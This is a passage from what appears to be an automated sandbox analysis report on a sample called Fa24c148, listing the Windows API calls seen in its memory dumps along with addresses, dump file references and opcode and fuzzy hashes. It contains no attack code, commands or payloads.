                                                                                                    • Associated: 00000000.00000002.2028502042.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Fa24c148.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileRead
                                                                                                    • String ID:
                                                                                                    • API String ID: 2738559852-0
                                                                                                    • Opcode ID: 706c1f52c55adc451273f1d2a5d46862a6587a7fe095f8bbabcbc32b8b015297
                                                                                                    • Instruction ID: 68b9e35a43bd0b01ba0fc1ca952cb594bc8cf903dff1417d3183e578cb5b5c3a
                                                                                                    • Opcode Fuzzy Hash: 706c1f52c55adc451273f1d2a5d46862a6587a7fe095f8bbabcbc32b8b015297
                                                                                                    • Instruction Fuzzy Hash: 53E0EC3261425AEFDF50AEA59C44AEB7B6CFB053A0F004433FD15E7190D231E9219FA9
                                                                                                    APIs
                                                                                                    • VirtualProtect.KERNELBASE(1000405C,00000004,00000040,1000404C), ref: 100027AB
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2032781626.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2032762594.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2032798460.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2032821608.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_10000000_Fa24c148.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ProtectVirtual
                                                                                                    • String ID:
                                                                                                    • API String ID: 544645111-0
                                                                                                    • Opcode ID: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
                                                                                                    • Instruction ID: 267fa8ad402a2f1685f06aa6efb9df116a04c7e31b4918ac066fddfc95f4d9be
                                                                                                    • Opcode Fuzzy Hash: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
                                                                                                    • Instruction Fuzzy Hash: 5EF092F15097A0DEF350DF688C847063BE0E7483C4B03852AE368F6268EB344044CF19
                                                                                                    APIs
                                                                                                    • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015A6
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2028141956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2028124677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028161718.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Fa24c148.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AttributesFile
                                                                                                    • String ID:
                                                                                                    • API String ID: 3188754299-0
                                                                                                    • Opcode ID: 2a616e06c792cf265676b57026b4e4a9577b39f593b79c63b522db00f6807e26
                                                                                                    • Instruction ID: 3a008f1eb1b1242b40efb84196f5f05472ca672afc8891d9c26caab598a60342
                                                                                                    • Opcode Fuzzy Hash: 2a616e06c792cf265676b57026b4e4a9577b39f593b79c63b522db00f6807e26
                                                                                                    • Instruction Fuzzy Hash: 88D012B2B08100D7CB10DFE5AA08ADDB7659B10339F304A77D101F21D0D2B8C5419A2A
                                                                                                    APIs
                                                                                                    • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040401A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2028141956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2028124677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028161718.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Fa24c148.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend
                                                                                                    • String ID:
                                                                                                    • API String ID: 3850602802-0
                                                                                                    • Opcode ID: a4d713ec37b01fb01d6fe416f7f1015fc8604d13c1c7eace86c6fa01d5da54e1
                                                                                                    • Instruction ID: 7e6010ae37c62f63916f0126c22991c2454b69940bf40bafb173ceb87b5e62a9
                                                                                                    • Opcode Fuzzy Hash: a4d713ec37b01fb01d6fe416f7f1015fc8604d13c1c7eace86c6fa01d5da54e1
                                                                                                    • Instruction Fuzzy Hash: 14C04C717443007AEA308B60AD45F2A7754A758701F5444697300B50D0C674E411D61D
                                                                                                    APIs
                                                                                                    • SendMessageW.USER32(00000028,?,00000001,00403E1D), ref: 00403FFF
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2028141956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2028124677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028161718.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Fa24c148.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend
                                                                                                    • String ID:
                                                                                                    • API String ID: 3850602802-0
                                                                                                    • Opcode ID: 68c7d3c3e0f7f1cab3b80b2c1a5527bcb09bd52aa90d361a41447b3617ec313a
                                                                                                    • Instruction ID: 784fd17e5df65fd1e582592ff515389eb2153c2e002f91b2ba79ebddce7a884a
                                                                                                    • Opcode Fuzzy Hash: 68c7d3c3e0f7f1cab3b80b2c1a5527bcb09bd52aa90d361a41447b3617ec313a
                                                                                                    • Instruction Fuzzy Hash: D6B09235685201BAEA214B00ED09F957A62A768701F008464B300240B0C6B248A2DB09
                                                                                                    APIs
                                                                                                    • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402F30,?,?,?,?,00000000,00403425,?), ref: 004031C2
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2028141956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2028124677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028161718.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Fa24c148.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FilePointer
                                                                                                    • String ID:
                                                                                                    • API String ID: 973152223-0
                                                                                                    • Opcode ID: 3f2450370ff6ec370cb83e2696936d8051f71d6c0ea90f8f087f694b7f33879c
                                                                                                    • Instruction ID: 9708a756cc2c9ae94551e8e9c592081b607f980c3267f7876f2ac268d6c84cd7
                                                                                                    • Opcode Fuzzy Hash: 3f2450370ff6ec370cb83e2696936d8051f71d6c0ea90f8f087f694b7f33879c
                                                                                                    • Instruction Fuzzy Hash: B8B01231584200BFDA214F00DE05F057B21A790700F10C030B304381F082712420EB5D
                                                                                                    APIs
                                                                                                    • KiUserCallbackDispatcher.NTDLL(?,00403DB6), ref: 00403FE8
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2028141956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2028124677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028161718.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Fa24c148.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CallbackDispatcherUser
                                                                                                    • String ID:
                                                                                                    • API String ID: 2492992576-0
                                                                                                    • Opcode ID: 2acc807be0ba679717be6b01d9f42da513ad5f0c2234181876513f9ebcad2aad
                                                                                                    • Instruction ID: b1b9a75aa143e31e8517bedffcdc50d49ca7046a294c6db3a10a508eb0cd57f7
                                                                                                    • Opcode Fuzzy Hash: 2acc807be0ba679717be6b01d9f42da513ad5f0c2234181876513f9ebcad2aad
                                                                                                    • Instruction Fuzzy Hash: 31A01132808000ABCA028B80EF08C0ABB22BBB0300B008838B208808308A320820EB0E
                                                                                                    APIs
                                                                                                    • Sleep.KERNELBASE(00000000), ref: 004014E6
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2028141956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2028124677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028161718.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Fa24c148.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Sleep
                                                                                                    • String ID:
                                                                                                    • API String ID: 3472027048-0
                                                                                                    • Opcode ID: 6917fec6ffc34fff1feb0dbf9c249be8de4da10d42883fba5183095b7f77083d
                                                                                                    • Instruction ID: ca840a0cce859b8ae2bc82a563140a091be244092cc4fcaf6916384ea8909f5f
                                                                                                    • Opcode Fuzzy Hash: 6917fec6ffc34fff1feb0dbf9c249be8de4da10d42883fba5183095b7f77083d
                                                                                                    • Instruction Fuzzy Hash: E6D0C9B7B141409BDB54EBB8AE8989B73A8E7513297204C73D942F20A1D578D8028A3D
                                                                                                    APIs
                                                                                                    • GetDlgItem.USER32(?,000003F9), ref: 004049B5
                                                                                                    • GetDlgItem.USER32(?,00000408), ref: 004049C0
                                                                                                    • GlobalAlloc.KERNEL32(00000040,?), ref: 00404A0A
                                                                                                    • LoadBitmapW.USER32(0000006E), ref: 00404A1D
                                                                                                    • SetWindowLongW.USER32(?,000000FC,00404F95), ref: 00404A36
                                                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A4A
                                                                                                    • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404A5C
                                                                                                    • SendMessageW.USER32(?,00001109,00000002), ref: 00404A72
                                                                                                    • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A7E
                                                                                                    • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404A90
                                                                                                    • DeleteObject.GDI32(00000000), ref: 00404A93
                                                                                                    • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404ABE
                                                                                                    • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404ACA
                                                                                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B60
                                                                                                    • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404B8B
                                                                                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B9F
                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00404BCE
                                                                                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BDC
                                                                                                    • ShowWindow.USER32(?,00000005), ref: 00404BED
                                                                                                    • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CEA
                                                                                                    • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D4F
                                                                                                    • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D64
                                                                                                    • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D88
                                                                                                    • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404DA8
                                                                                                    • ImageList_Destroy.COMCTL32(?), ref: 00404DBD
                                                                                                    • GlobalFree.KERNEL32(?), ref: 00404DCD
                                                                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E46
                                                                                                    • SendMessageW.USER32(?,00001102,?,?), ref: 00404EEF
                                                                                                    • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404EFE
                                                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 00404F1E
                                                                                                    • ShowWindow.USER32(?,00000000), ref: 00404F6C
                                                                                                    • GetDlgItem.USER32(?,000003FE), ref: 00404F77
                                                                                                    • ShowWindow.USER32(00000000), ref: 00404F7E
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2028141956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2028124677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028161718.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Fa24c148.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                    • String ID: $M$N
                                                                                                    • API String ID: 1638840714-813528018
                                                                                                    • Opcode ID: 0ffa46e9b13a572b6722491aa1927339d9f69ee42a2e2a1cbbe2628bd448c1d8
                                                                                                    • Instruction ID: f03e607a396e187e7a88a72d0c11c4872557c7a4ae09ea9be525cead3dabdd13
                                                                                                    • Opcode Fuzzy Hash: 0ffa46e9b13a572b6722491aa1927339d9f69ee42a2e2a1cbbe2628bd448c1d8
                                                                                                    • Instruction Fuzzy Hash: A90294B0900209EFEB209F55DD45AAE7BB5FB84314F10817AF610B62E0C7799D52CF58
                                                                                                    APIs
                                                                                                    • GetDlgItem.USER32(?,000003FB), ref: 004044A6
                                                                                                    • SetWindowTextW.USER32(00000000,?), ref: 004044D0
                                                                                                    • SHBrowseForFolderW.SHELL32(?), ref: 00404581
                                                                                                    • CoTaskMemFree.OLE32(00000000), ref: 0040458C
                                                                                                    • lstrcmpiW.KERNEL32(Call,00422698,00000000,?,?), ref: 004045BE
                                                                                                    • lstrcatW.KERNEL32(?,Call), ref: 004045CA
